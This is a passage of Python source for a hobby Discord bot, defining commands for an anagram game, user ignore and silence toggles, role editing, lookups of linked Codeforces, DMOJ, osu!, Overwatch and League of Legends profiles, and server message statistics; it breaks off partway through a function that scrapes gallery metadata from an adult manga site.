            await send(message, f"Added '{word}' to the dictionary!")
    else:
        await send(message, "Words must only contain letters!", reaction = "x")
@client.command("Anagram Commands", ["anagram", "rm", "?"], "anagram rm <word>", "alias for `anagram remove`")
@client.command("Anagram Commands", ["anagram", "remove", "?"], "anagram remove <word>", "remove a word from the anagram dictionary")
async def command_anagram_remove(command, message):
    """Delete a word from the on-disk anagram dictionary and the in-memory index."""
    global words, wordmap
    word = command[3].strip().lower()
    if word not in words:
        await send(message, "This word is not in the dictionary!", reaction = "x")
        return
    words.remove(word)
    # Rewrite the dictionary file without the removed word.
    with open("data/words.txt", "w") as f:
        f.write("\n".join(words))
    wordmap["".join(sorted(word))].discard(word)
    await send(message, f"Removed '{word}' from the dictionary!")
@client.command("Anagram Commands", ["anagram", "lb"], "anagram lb", "alias for `anagram leaderboard`")
@client.command("Anagram Commands", ["anagram", "leaderboard"], "anagram leaderboard", "show the leaderboard for the anagram puzzle")
async def command_anagram_leaderboard(command, message):
    """Post the anagram score leaderboard for members of this server.

    Fix: sorting `(score, member)` tuples fell back to comparing Member
    objects whenever two members had equal scores, raising TypeError; the
    sort now keys on the score alone (stable sort preserves member order
    for ties).
    """
    scoremap = await get_data("leaderboard", "anagram")
    # Only list members of this guild who have a nonzero score.
    scores = [(scoremap.get(member.id, 0), member) for member in message.guild.members]
    scores = [entry for entry in scores if entry[0]]
    scores.sort(key = lambda entry: entry[0], reverse = True)
    await send(message, embed = discord.Embed(
        title = "Leaderboard - Anagram",
        description = "\n".join(f"{member.mention} - {score}" for score, member in scores)
    ))
@client.command("", lambda m: True, "", "")
async def command_anagram_answer(command, message):
    # Catch-all handler: treat every message as a potential anagram guess.
    try:
        # Strip surrounding whitespace/punctuation before checking the guess.
        await anagram_function(message, answer = message.content.strip().strip("!@#$%^&*()[]{}/|\.,<>\"'").lower())
    except:
        # Best-effort: any failure is swallowed so ordinary chat messages
        # never produce error output from this handler.
        pass
@client.command("User Commands", ["alias", "?", "?"], "alias <name> <user>", "alias a name to a user")
async def command_alias(command, message):
    """Map a per-server nickname onto a member for later user lookups."""
    target = await get_member(message.guild, command[3], message.author)
    name = command[2].lower()
    await set_data("aliases", message.guild.id, name, target.id)
    await send(message, f"Aliased '{name}' to {target.mention}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unalias", "?"], "unalias <name>", "remove a name's alias")
async def command_unalias(command, message):
    """Clear a per-server nickname mapping (stores None rather than deleting the key)."""
    name = command[2].lower()
    await set_data("aliases", message.guild.id, name, None)
    await send(message, f"Removed the alias for '{name}'!")
@client.command("User Commands", ["unbonk", "?", "..."], "unbonk <user>", "alias for `unignore`")
@client.command("User Commands", ["unignore", "?", "..."], "unignore <user>", "make the bot no longer ignore messages from a particular user (on a server)")
@client.command("User Commands", ["bonk", "?", "..."], "bonk <user>", "alias for `ignore`")
@client.command("User Commands", ["ignore", "?", "..."], "ignore <user>", "make the bot ignore all messages from a particular user (on a server)")
async def command_ignore(command, message):
    """Toggle whether the bot ignores a user's messages on this server.

    `ignore`/`bonk` enable ignoring; the `un`-prefixed forms disable it.
    Self-targeting is rejected for the enabling forms only.
    """
    verb = command[1]
    enabling = not verb.startswith("un")
    for uinfo in command[2:]:
        member = await get_member(message.guild, uinfo, message.author)
        if enabling and member == message.author:
            await send(message, f"You cannot {verb} yourself!", reaction = "x")
            continue
        await set_data("ignore", message.guild.id, member.id, enabling)
        if enabling:
            reply = f"{'Bonk! ' * (verb == 'bonk')}Now ignoring {member.mention}!"
        else:
            reply = f"No longer ignoring {member.mention}!"
        await send(message, reply, allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unshut", "?", "..."], "unshut <user>", "alias for `unsilence`")
@client.command("User Commands", ["unsilence", "?", "..."], "unsilence <user>", "make the bot no longer delete messages from a particular user (on a server)")
@client.command("User Commands", ["shut", "?", "..."], "shut <user>", "alias for `silence`")
@client.command("User Commands", ["silence", "?", "..."], "silence <user>", "make the bot delete messages from a particular user (on a server)")
async def command_silence(command, message):
    """Toggle whether the bot deletes a user's messages on this server.

    Fix: the registered syntax/description strings were copy-pasted from the
    bonk/ignore commands (help showed `bonk <user>`, `ignore <user>`, etc.,
    and `unsilence` claimed to *delete* messages); they now describe the
    actual shut/silence commands.
    """
    for uinfo in command[2:]:
        member = await get_member(message.guild, uinfo, message.author)
        if not command[1].startswith("un") and member == message.author:
            await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
        else:
            await set_data("silence", message.guild.id, member.id, not command[1].startswith("un"))
            await send(message, f"No longer silencing {member.mention}!" if command[1].startswith("un") else f"{'https://i.redd.it/l5jmlb1ltqj51.jpg' * (command[1] == 'shut')}Now silencing {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
# @client.command("Role Commands", ["gib", "?", "..."], "gib <name> [roles...]", "alias for `role give`")
# @client.command("Role Commands", ["role", "give", "?", "..."], "role give <name> [roles...]", "give a list of roles to a user")
# async def command_role_give(command, message):
# user, *names = command[2 if command[1] == "gib" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# if any(role.id == 741731868692709416 for role in roles) and member.id != 251082987360223233:
# await send(message, f"<@&741731868692709416> is exclusive to <@!251082987360223233>!", allowed_mentions = discord.AllowedMentions.none())
# else:
# await member.add_roles(*roles)
# await send(message, f"Granted {english_list(quote(role.mention for role in roles))} to {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
# @client.command("Role Commands", ["gibnt", "?", "..."], "gibnt <name> [roles...]", "alias for `role remove`")
# @client.command("Role Commands", ["role", "remove", "?", "..."], "role remove <name> [roles...]", "remove a list of roles from a user")
# async def command_role_remove(command, message):
# user, *names = command[2 if command[1] == "gibnt" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# await member.remove_roles(*roles)
# await send(message, f"Removed {english_list(quote(role.mention for role in roles))} from {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
@client.command("", ["role", "colour", "?"], "", "")
@client.command("", ["role", "color", "?"], "", "")
@client.command("Role Commands", ["role", "colour", "?", "?"], "role colour <role> [colour = 0]", "alias for `role color`")
@client.command("Role Commands", ["role", "color", "?", "?"], "role color <role> [color = 0]", "recolor a role, or remove its color")
async def command_role_color(command, message):
    """Set a role's color; with no color argument, "0" clears it."""
    role = get_role(message.guild, command[3])
    color_arg = command[4] if len(command) > 4 else "0"
    await role.edit(color = get_color(color_arg))
    await send(message, f"Recolored '{role.mention}'!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Role Commands", ["role", "rename", "?", "?"], "role rename <role> <name>", "rename a role")
async def command_role_rename(command, message):
    """Rename a role, reporting both the old and new names."""
    role = get_role(message.guild, command[3])
    old_name, new_name = role.name, command[4]
    await role.edit(name = new_name)
    await send(message, f"Renamed '{old_name}' to '{new_name}'!")
# Canonical service keys for external-account linking, keyed by every
# accepted alias (e.g. both "lol" and "league" map to "lol").
services = {}
for canonical, aliases in [
    ("lol", ("lol", "league")),
    ("dmoj", ("dmoj",)),
    ("cf", ("cf", "codeforces")),
    ("osu", ("osu",)),
    ("ow", ("ow", "overwatch")),
]:
    for alias in aliases:
        services[alias] = canonical

# All accepted aliases, used as an option tuple in the command patterns below.
service_list = tuple(services)
@client.command("", [service_list, "link", "?"], "", "")
@client.command("External User Commands", [service_list, "link", "?", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> link [user = me] <account>", "link a user to an external account")
async def command_link(command, message):
    """Associate a member (default: the caller) with an external account name."""
    service = services[command[1]]
    # Five tokens means a target user was named; four means the caller links themselves.
    target = command[3] if len(command) == 5 else "me"
    member = await get_member(message.guild, target, message.author)
    await set_data("external", service, member.id, command[-1])
    await send(message, f"Linked {member.mention} to {command[-1]}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("", [service_list, "unlink"], "", "")
@client.command("External User Commands", [service_list, "unlink", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> unlink [user = me]", "unlink a user from a service")
async def command_unlink(command, message):
    """Remove a member's external-account link for a service.

    Fix: this handler was also named `command_link`, shadowing the link
    handler above at module level. Registration happens at decoration time
    so bot behavior was unaffected, but the rename removes the shadowing.
    """
    service = services[command[1]]
    member = await get_member(message.guild, command[3] if len(command) == 4 else "me", message.author)
    await del_data("external", service, member.id)
    await send(message, f"Unlinked {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
async def get_ext_user(key, error, command, message):
    """Resolve the external-account name a command should operate on.

    With no explicit argument (3 tokens) the caller must already be linked,
    otherwise a BotError is raised using the `error` noun phrase. With an
    argument, a linked member's stored account is preferred; if the argument
    is not a linked member, it is passed through as the raw account name.
    """
    if len(command) == 3:
        if not await has_data("external", key, message.author.id):
            raise BotError(f"You are not linked; please specify {error} or link yourself first!")
        return await get_data("external", key, message.author.id)
    try:
        member = await get_member(message.guild, command[3], message.author)
        if await has_data("external", key, member.id):
            return await get_data("external", key, member.id)
    except:
        # Argument did not resolve to a member; fall through to the raw name.
        pass
    return command[3]
@client.command("", [("cf", "codeforces"), ("details", "rank", "rating")], "", "")
@client.command("External User Commands", [("cf", "codeforces"), ("details", "rank", "rating"), "?"], "cf/codeforces <details | rank/rating> [user = me]", "report a codeforces user's public details or just rank+rating")
async def command_cf_details(command, message):
    """Report a Codeforces user's rank/rating, or a full profile embed for `details`."""
    cf = await get_ext_user("cf", "a codeforces user", command, message)
    rv = requests.get("https://codeforces.com/api/user.info?handles=" + cf).json()
    if rv["status"] == "OK":
        cfdata = rv["result"][0]
        if command[2] == "rank" or command[2] == "rating":
            # Compact one-line summary of current and peak rank/rating.
            await send(message, f"{cf} is rank {cfdata['rank']} [{cfdata['rating']}] (max {cfdata['maxRank']} [{cfdata['maxRating']}])!")
        else:
            embed = discord.Embed(title = cf, color = client.color, url = "https://codeforces.com/profile/" + cf).set_thumbnail(url = "http:" + cfdata["avatar"])
            # Optional profile fields: only shown when present and truthy.
            for key, name in [
                ("email", "Email Address"),
                ("firstName", "First Name"),
                ("lastName", "Last Name"),
                ("organization", "Organization"),
                ("contribution", "Contribution"),
                ("friendOfCount", "Friend Of #")
            ]:
                if cfdata.get(key):
                    embed.add_field(name = name, value = str(cfdata[key]))
            if cfdata.get("country") or cfdata.get("city"):
                # City is optional; country is appended unconditionally here
                # (assumes country is present whenever city is — TODO confirm).
                city = f"{cfdata['city']}, " if cfdata.get("city") else ""
                embed.add_field(name = "Location", value = f"{city}{cfdata['country']}")
            embed.add_field(name = "Current Rank", value = f"{cfdata['rank']} [{cfdata['rating']}]")
            embed.add_field(name = "Maximum Rank", value = f"{cfdata['maxRank']} [{cfdata['maxRating']}]")
            embed.add_field(name = "Registered Since", value = datetime.datetime.fromtimestamp(cfdata["registrationTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
            embed.add_field(name = "Last Seen Online", value = datetime.datetime.fromtimestamp(cfdata["lastOnlineTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
            await send(message, embed = embed)
    else:
        await send(message, f"'{cf}' is not a codeforces user!", reaction = "x")
def dmoj_api(URL):
    """Fetch a DMOJ API v2 endpoint and return its 'data' payload.

    Raises BotError on a non-200 status, an API-reported error, or a
    response without a 'data' key.
    """
    response = requests.get(URL)
    if response.status_code != 200:
        raise BotError(f"'{URL}' returned status {response.status_code} (not 200)!")
    payload = response.json()
    if "error" in payload:
        raise BotError("Error fetching from DMOJ API; likely item does not exist!")
    if "data" not in payload:
        raise BotError("Data not found; check the URL!")
    return payload["data"]
def _dmoj_rank_name(rating):
    """Map a DMOJ rating to its display rank name (ladder extracted from the handler below)."""
    for ceiling, name in [
        (1000, "Newbie"),
        (1200, "Amateur"),
        (1500, "Expert"),
        (1800, "Candidate Master"),
        (2200, "Master"),
        (3000, "Grandmaster"),
    ]:
        if rating < ceiling:
            return name
    return "Target"

@client.command("", ["dmoj", ("details", "rank", "rating")], "", "")
@client.command("External User Commands", ["dmoj", ("details", "rank", "rating"), "?"], "dmoj <details | rank/rating> [user = me]", "report a DMOJ user's public details or just rank+rating")
async def command_dmoj_details(command, message):
    """Report a DMOJ user's rank/rating, or a full profile embed for `details`.

    Improvement: the rating-to-rank ladder is factored into `_dmoj_rank_name`
    (mirroring `display_ow_rank` below); behavior is unchanged.
    """
    dm = await get_ext_user("dmoj", "a DMOJ user", command, message)
    dmdata = dmoj_api("https://dmoj.ca/api/v2/user/" + dm)["object"]
    rating = dmdata["rating"]
    rank = _dmoj_rank_name(rating)
    if dmdata["rank"] == "admin":
        rank += " (Admin)"
    if command[2] == "rank" or command[2] == "rating":
        await send(message, f"{dmdata['username']} is rank {rank} [{rating}]!")
    elif command[2] == "details":
        await send(message, embed = discord.Embed(
            title = dmdata["username"],
            color = 0x3333AA,
            url = "https://dmoj.ca/user/" + dmdata["username"]
        ).add_field(
            name = "Points",
            value = "%.2f" % dmdata["points"]
        ).add_field(
            name = "Solved Problems",
            value = str(dmdata["problem_count"])
        ).add_field(
            name = "Contests",
            value = str(len(dmdata["contests"]))
        ).add_field(
            name = "Organizations",
            # Resolve the user's organization IDs to their short names.
            value = ", ".join(org["short_name"] for org in dmoj_api("https://dmoj.ca/api/v2/organizations")["objects"] if org["id"] in dmdata["organizations"])
        ).add_field(
            name = "Rank",
            value = rank
        ).add_field(
            name = "Rating",
            value = str(rating)
        ))
@client.command("", ["osu", ("details", "summary")], "", "")
@client.command("External User Commands", ["osu", ("details", "summary"), "?"], "osu <details | summary> [player = me]", "report an osu player's public details or summary")
async def command_osu_details(command, message):
    """Report an osu! player's stats via the legacy get_user API.

    NOTE(review): the embed titles look swapped relative to the subcommand —
    `summary` sends the compact embed titled "player details" and `details`
    sends the full embed titled "player summary"; confirm intent before
    changing.
    """
    osu = await get_ext_user("osu", "an osu! player", command, message)
    rv = requests.get(f"https://osu.ppy.sh/api/get_user?k={config['api-keys']['osu']}&u={osu}")
    if rv.status_code == 200:
        data = rv.json()
        # The API returns an empty list for unknown players.
        if data == []:
            await send(message, "Could not find an osu! player by that username/ID!", reaction = "x")
        else:
            user = data[0]
            if command[2] == "summary":
                await send(message, embed = discord.Embed(title = f"osu! player details: {user['username']}", description = f"Level {user['level']}\nPP: {user['pp_raw']}\nRank: #{user['pp_rank']} (#{user['pp_country_rank']})\nAccuracy: {user['accuracy']}", color = client.color).set_thumbnail(url = f"http://s.ppy.sh/a/{user['user_id']}"))
            else:
                # Convert total playtime (seconds) to H:MM:SS.
                seconds = int(user["total_seconds_played"])
                minutes, seconds = divmod(seconds, 60)
                hours, minutes = divmod(minutes, 60)
                await send(message, embed = discord.Embed(
                    title = f"osu! player summary: {user['username']} #{user['user_id']}",
                    description = f"User since {user['join_date']}",
                    url = f"https://osu.ppy.sh/users/{user['user_id']}",
                    color = client.color
                ).add_field(
                    name = "Level",
                    value = user["level"]
                ).add_field(
                    name = "Accuracy",
                    value = user["accuracy"]
                ).add_field(
                    name = "Performance Points",
                    value = user["pp_raw"]
                ).add_field(
                    name = "Rank",
                    # Country code is resolved to the full country name.
                    value = f"#{user['pp_rank']} (#{user['pp_country_rank']} in {pycountry.countries.get(alpha_2 = user['country']).name})"
                ).add_field(
                    name = "Score Counts",
                    value = " ".join(f"{user['count' + x]} {emoji('osu_' + x)}" for x in ["300", "100", "50"]),
                    inline = False
                ).add_field(
                    name = "Rating Counts",
                    value = " ".join(f"{user['count_rank_' + x.lower()]} {emoji('osu_' + x)}" for x in ["SSH", "SS", "SH", "S", "A"]),
                    inline = False
                ).add_field(
                    name = "Best Score",
                    value = user['ranked_score']
                ).add_field(
                    name = "Total Score",
                    value = user['total_score']
                ).add_field(
                    name = "Time Played",
                    value = f"{hours}:{str(minutes).zfill(2)}:{str(seconds).zfill(2)}"
                ).set_thumbnail(
                    url = f"http://s.ppy.sh/a/{user['user_id']}"
                ))
    else:
        await send(message, f"Failed to fetch from osu! API: status code {rv.status_code}!", reaction = "x")
def display_ow_rank(rating):
    """Format an Overwatch rating as 'rating <tier emoji>'.

    Non-numeric ratings (or any failure, including the emoji lookup) fall
    back to returning the raw rating unchanged.
    """
    try:
        sr = int(rating)
        tier = "ow_grandmaster"
        for ceiling, name in [
            (1500, "ow_bronze"),
            (2000, "ow_silver"),
            (2500, "ow_gold"),
            (3000, "ow_platinum"),
            (3500, "ow_diamond"),
            (4000, "ow_master"),
        ]:
            if sr < ceiling:
                tier = name
                break
        return f"{rating} {emoji(tier)}"
    except:
        return rating
@client.command("", [("ow", "overwatch"), "summary"], "", "")
@client.command("External User Commands", [("ow", "overwatch"), "summary", "?"], "ow/overwatch summary <player = me>", "report an overwatch player's summary")
async def command_ow_summary(command, message):
    """Post an Overwatch player summary fetched from the ow-api.com profile endpoint."""
    ow = await get_ext_user("ow", "a Blizzard battletag", command, message)
    try:
        # Battletag must be formatted as `name-number` for this endpoint.
        r = requests.get(f"https://ow-api.com/v1/stats/pc/us/{ow}/profile")
        if r.status_code != 200:
            raise RuntimeError("Status Code not 200")
        data = r.json()
        # Inner try: the fetch succeeded, so failures here are embed/data
        # problems and get their own error message (with a traceback print).
        try:
            await send(message, embed = discord.Embed(
                title = f"Overwatch player summary: {data['name']}",
                description = "",
                color = client.color
            ).add_field(
                name = "Level",
                # Each prestige is worth 100 levels.
                value = str(data["level"] + 100 * data["prestige"])
            ).add_field(
                name = "Rating",
                value = display_ow_rank(data["rating"])
            ).add_field(
                name = "Games Won",
                value = str(data["gamesWon"])
            ).add_field(
                name = "Competitive Winrate",
                value = "%.2f%%" % (data["competitiveStats"]["games"]["won"] / data["competitiveStats"]["games"]["played"] * 100) if "games" in data["competitiveStats"] else "N/A"
            ).set_thumbnail(
                url = data["icon"]
            ))
        except:
            print(traceback.format_exc())
            await send(message, "Failed to generate embed!", reaction = "x")
    except:
        await send(message, f"Failed to fetch user data for `{ow}` from Overwatch API; check the spelling of this battletag (please format as `name-number`)!", reaction = "x")
@client.command("", [("lol", "league"), ("report", "current", "report-player", "current-player")], "", "")
@client.command("League of Legends Commands", [("lol", "league"), ("report", "current", "report-player", "current-player"), "?"], "lol/league <report | current>[-player] [player = me]", "create a game report for the player")
async def command_lol_report(command, message):
    """Post a League of Legends game report embed.

    `report`/`report-player` cover the summoner's most recent finished match;
    `current`/`current-player` cover the game they are spectatably in right
    now. The `-player` variants use the per-player embed builders.
    """
    sm = await get_ext_user("lol", "a League of Legends summoner", command, message)
    try:
        summoner = watcher.summoner.by_name(lol_region, sm)
        if command[2] == "report" or command[2] == "report-player":
            try:
                # Most recent match only (end_index = 1).
                game = watcher.match.matchlist_by_account(lol_region, summoner["accountId"], end_index = 1)["matches"][0]
                try:
                    if command[2] == "report":
                        await send(message, embed = await lol_game_embed(message.guild, game["gameId"], sm, False), reaction = "check")
                    elif command[2] == "report-player":
                        await send(message, embed = await lol_player_embed(message.guild, game["gameId"], sm, False), reaction = "check")
                except:
                    # Embed construction failed; the match itself was found.
                    print(traceback.format_exc())
                    await send(message, "Failed to create embed!", reaction = "x")
            except Exception as e:
                await send(message, f"Could not find a game for {lol_region.upper()}/{sm}! The summoner may not have played a proper game recently enough.", reaction = "x")
        else:
            try:
                # Live (spectator) game lookup.
                game = watcher.spectator.by_summoner(lol_region, summoner["id"])
                try:
                    if command[2] == "current":
                        await send(message, embed = await lol_current_embed(message.guild, game, sm))
                    elif command[2] == "current-player":
                        await send(message, embed = await lol_current_player_embed(message.guild, game, [sm]))
                except:
                    print(traceback.format_exc())
                    await send(message, "Failed to create embed!", reaction = "x")
            except Exception as e:
                await send(message, f"Could not find current game for {lol_region.upper()}/{sm}! The summoner may not be in game.", reaction = "x")
    except:
        await send(message, f"Could not find summoner {lol_region.upper()}/{sm}! Please check your spelling.", reaction = "x")
@client.command("League of Legends Commands", [("lol", "league"), "rotation"], "lol/league rotation", "check the current free champion rotation")
async def command_lol_rotation(command, message):
    """Report this week's free-to-play champion rotation, alphabetically."""
    rotation = sorted(champs[cid] for cid in watcher.champion.rotations(lol_region)["freeChampionIds"])
    await send(message, f"This week's free rotation is: {english_list(rotation)}.")
@client.command("League of Legends Commands", [("lol", "league"), "ranges", "..."], "lol/league ranges <champion> [champion...]", "compare ability ranges for champions")
async def command_lol_ranges(command, message):
    """Compare basic-attack and ability ranges across one or more champions.

    Builds a sorted list of (range, champion, ability) entries from Data
    Dragon, groups equal ranges together, and posts a combined analysis.
    """
    champs = set()
    for champ in command[3:]:
        champ = champ.lower()
        if champ not in cmap:
            await send(message, f"{champ} is not a recognized champion name or ID!", reaction = "x")
            break
        champs.add(cmap[champ])
    else:
        # Only reached when every champion argument resolved (no break).
        items = []
        for champ in champs:
            data = requests.get(f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/data/en_US/champion/{champ}.json").json()
            items.append((data["data"][champ]["stats"]["attackrange"], data["data"][champ]["name"], "Basic Attack"))
            for i, spell in enumerate(data["data"][champ]["spells"]):
                # Label spells by slot letter (Q/W/E/R).
                ident = data["data"][champ]["name"] + " " + ("QWER"[i] if 0 <= i < 4 else "?")
                if len(set(spell["range"])) == 1:
                    # Range is the same at every rank: one entry.
                    items.append((spell["range"][0], ident, spell["name"]))
                else:
                    # Range varies by rank: group the ranks sharing each range.
                    clusters = {}
                    for i, r in enumerate(spell["range"]):
                        if r not in clusters:
                            clusters[r] = []
                        clusters[r].append(i + 1)
                    for key in clusters:
                        items.append((key, ident, spell["name"] + " Rank " + "/".join(map(str, clusters[key]))))
        items.sort()
        # Stack consecutive entries with equal range for display.
        stacked = []
        for item in items:
            if stacked == [] or item[0] != stacked[-1][0]:
                stacked.append([item[0], []])
            stacked[-1][1].append((item[1], item[2]))
        info = "**Range Analysis**\n"
        for rng, stack in stacked:
            stack = ", ".join(f"{ident} ({name})" for ident, name in stack)
            info += f"\n__{rng}__: {stack}"
        await send(message, info, reaction = "check")
@client.command("League of Legends Commands", [("lol", "league"), "item", "?", "..."], "lol item <name>", "get details about an item")
async def command_lol_item(command, message):
    """Look up a League of Legends item and post an embed with its cleaned
    description, build path, and human-readable stat/utility tags."""
    item = find_item("".join(command[3:]).lower())
    await send(message, embed = discord.Embed(
        title = f"League of Legends Item: {item['name']} (#{item['id']})",
        # Clean the Data Dragon HTML description: <br>/<li> become newlines,
        # remaining tags are stripped, runs of spaces collapse, and stray
        # spaces just inside parentheses (left by tag removal) are removed.
        description = re.sub("(\\() (.)|(.) (\\))", "\\1\\2\\3\\4", re.sub(" +", " ", re.sub("<[^>]+?>", "", re.sub("<br>|<li>", "\n", item["description"])))),
        color = client.color,
        url = f"https://leagueoflegends.fandom.com/wiki/{item['name'].replace(' ', '_')}"
    ).add_field(
        name = "Build Path",
        value = build_path(item["id"]) + ("\n\nBuilds into: " + english_list(lolitems[key]["name"] for key in item.get("into")) if item.get("into") else "")
    ).add_field(
        name = "Tags",
        # Map Data Dragon's internal tag identifiers to display labels.
        value = "\n".join("- " + {
            "CriticalStrike": "Critical Strike",
            "NonbootsMovement": "Movement Speed",
            "SpellDamage": "Ability Power",
            "MagicPenetration": "Magic Penetration",
            "ArmorPenetration": "Armor Penetration",
            "SpellBlock": "Magic Resistance",
            "Slow": "Movement Reduction",
            "Jungle": "Jungling",
            "Health": "Health",
            "Lane": "Laning",
            "Aura": "Aura",
            "HealthRegen": "Health Regeneration",
            "SpellVamp": "Spell Vamp",
            "GoldPer": "Gold Income",
            "Mana": "Mana",
            "Vision": "Vision",
            "LifeSteal": "Physical Vamp",
            "Consumable": "Consumable",
            "Armor": "Armor",
            "Stealth": "Stealth",
            "ManaRegen": "Mana Regeneration",
            "OnHit": "On-Hit",
            "Active": "Active",
            "CooldownReduction": "Cooldown Reduction",
            "Trinket": "Trinket",
            "AttackSpeed": "Attack Speed",
            "Boots": "Boots",
            "AbilityHaste": "Ability Haste",
            "Tenacity": "Tenacity",
            "Damage": "Attack Damage"
        }[tag] for tag in item["tags"])
    ).set_thumbnail(
        url = f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/img/item/{item['id']}.png"
    ))
# Maximum display width for user/channel names in the stats tables below.
stats_length = 24
async def stats(channel, vis = None):
    """Count messages per author over *channel*'s entire history.

    vis: optional set of user IDs; when given, only those users' messages
    are counted. Returns (label, count) pairs sorted by descending count
    then label, where label is a truncated "name#discriminator"."""
    counts = {}
    async for message in channel.history(limit = None):
        if not vis or message.author.id in vis:
            # Reserve 5 columns of the label budget for "#" + discriminator.
            uinfo = f"{truncate(message.author.name, stats_length - 5)}#{message.author.discriminator}"
            counts[uinfo] = counts.get(uinfo, 0) + 1
    return sorted(counts.items(), key = lambda a: (-a[1], a[0]))
def truncate(string, length):
    """Shorten *string* to at most *length* characters, replacing the tail
    with a single ellipsis character when it is too long."""
    if len(string) <= length:
        return string
    return string[:length - 1] + "…"
@client.command("Server Statistics Commands", [("channel", "server"), "stats"], "<channel | server> stats", "output the number of messages sent in each channel by each user")
async def command_channel_stats(command, message):
    """Tally per-user message counts for the current channel, or per-user and
    per-channel counts across the whole server.

    Only counts messages from users who can see the invoking channel; in
    server mode, only indexes channels visible to all of those users.

    Fix: the per-channel percentage in server mode previously omitted the
    `* 100` factor, printing e.g. "0.05%" instead of "5.00%"."""
    v = set(m.id for m in message.channel.members)
    async with message.channel.typing():
        if command[1] == "channel":
            s = await stats(message.channel, v)
            total = sum(b for _, b in s)
            mc = len(str(max(b for _, b in s)))  # width of the largest count, for alignment
            l = max(len(a) for a, _ in s)
            await send(message, embed = discord.Embed(
                title = f"Channel Stats for #{message.channel.name}",
                description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in s) + "\n```",
                color = client.color
            ))
        else:
            vis = set(message.channel.members)
            counts = {}  # user label -> message count across all indexed channels
            ccount = {}  # channel id -> message count
            cname = {}   # channel id -> channel name
            total = 0
            failed = 0
            for channel in message.guild.channels:
                try:
                    if isinstance(channel, discord.TextChannel):
                        # Skip channels not visible to everyone here, so the
                        # stats don't leak activity from restricted channels.
                        if set(channel.members) >= vis:
                            cname[channel.id] = channel.name
                            for uinfo, count in await stats(channel, v):
                                counts[uinfo] = counts.get(uinfo, 0) + count
                                ccount[channel.id] = ccount.get(channel.id, 0) + count
                                total += count
                except Exception:
                    # Most likely missing history permission; reported at the end.
                    failed += 1
            mc = len(str(max(max(counts.values()), max(ccount.values()))))
            ul = max(map(len, counts))
            cl = max(map(len, cname.values()))
            l = min(max(ul, cl), stats_length)
            counts = sorted(counts.items(), key = lambda a: (-a[1], a[0]))
            ccount = sorted(ccount.items(), key = lambda a: (-a[1], a[0]))
            await send(message, embed = discord.Embed(
                title = f"Server Stats for {message.guild.name}",
                description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in counts) +
                    "\n\n" + "\n".join(f"#{truncate(cname[cid].ljust(l - 1), stats_length - 1)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for cid, count in ccount) + "\n```",
                color = client.color
            ))
            if failed:
                await send(message, f"Failed to index the results from {failed} channel{'s' * (failed != 1)}; likely this bot does not have permission to access them.")
@client.command("Miscellaneous Commands", ["blame"], "blame", "blame a random person in this channel (cannot blame any bots)")
async def command_blame(command, message):
    # Pick a random non-bot member of the channel and pin the blame on them.
    humans = [member for member in message.channel.members if not member.bot]
    await send(message, f"It was {random.choice(humans).mention}'s fault!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Miscellaneous Commands", ["spoiler", "image"], "spoiler image", "accept an image in a DM to spoiler (for mobile users)")
async def command_spoiler_image(command, message):
    # Register this channel so the user's next DM'd image(s) get reposted
    # here as spoilers; requires the user to accept DMs from the bot.
    notice = f"The next image(s) you DM to me will be sent to {message.guild.name}#{message.channel.name} as a spoiler."
    try:
        await dm(message.author, notice)
        await message.delete()
        await set_data("dm_spoiler", message.author.id, message.channel.id)
    except:
        await send(message, "You need to allow me to DM you to use this feature!", reaction = "x")
@client.command("Miscellaneous Commands", ["color", "image"], "color image", "auto-color the next image you send in this channel with DeepAI")
async def command_color_image(command, message):
    """Register the author's next image in this channel for AI auto-coloring.

    Renamed from command_spoiler_image: the original name duplicated the
    spoiler-image handler above and shadowed it at module level (the
    decorator had already registered both, but the module binding was lost)."""
    await send(message, f"The next image you send in this channel will be automatically colored with the power of Artificial Intelligence.")
    await set_data("img_color", message.author.id, message.channel.id, 0)
async def nhentai(nhid, force = False):
    """Fetch and cache gallery metadata for gallery ID *nhid*.

    Returns (title, subtitle, sauce, urls) where urls are full-size image
    links in page order. Results are cached under the "nhentai" data key;
    force = True bypasses the cache and re-scrapes.

    Raises BotError on a 404 or any other non-200 response."""
    if force or not await has_data("nhentai", nhid):
        response = requests.get(f"https://nhentai.net/g/{nhid}")
        if response.status_code == 404:
            raise BotError("404 Not Found!")
        elif response.status_code == 200:
            t = response.text
            # Rewrite thumbnail URLs ("t.nhentai.net/.../<page>t.<ext>") into
            # full-image URLs ("i.nhentai.net/.../<page>.<ext>").
            urls = {x.replace("t.", "i.", 1).replace("t.", ".") for x in re.findall("https://t\\.nhentai\\.net/galleries/\\d+/\\d+t\\.\\w+", t)}
            # Sort numerically on the integers embedded in each URL
            # (gallery id, then page number) for correct page order.
            urls = sorted(urls, key = lambda s: [int(x) for x in re.findall("\\d+", s)])
            title = re.findall("<span class=\"pretty\">\\s*(.+?)\\s*</span>", t)[0]
            subtitle = re.findall("<span class=\"after\">\\s*(.+?)\\s*</span>", t)[0]
            # First number in the first URL is the internal gallery ("sauce") id.
            sauce = int(re.findall("\\d+", urls[0])[0])
            await set_data("nhentai", nhid, (title, subtitle, sauce, urls))
            return (title, subtitle, sauce, urls)
        else:
            raise BotError(f"Unknown error: {response.status_code}")
    else:
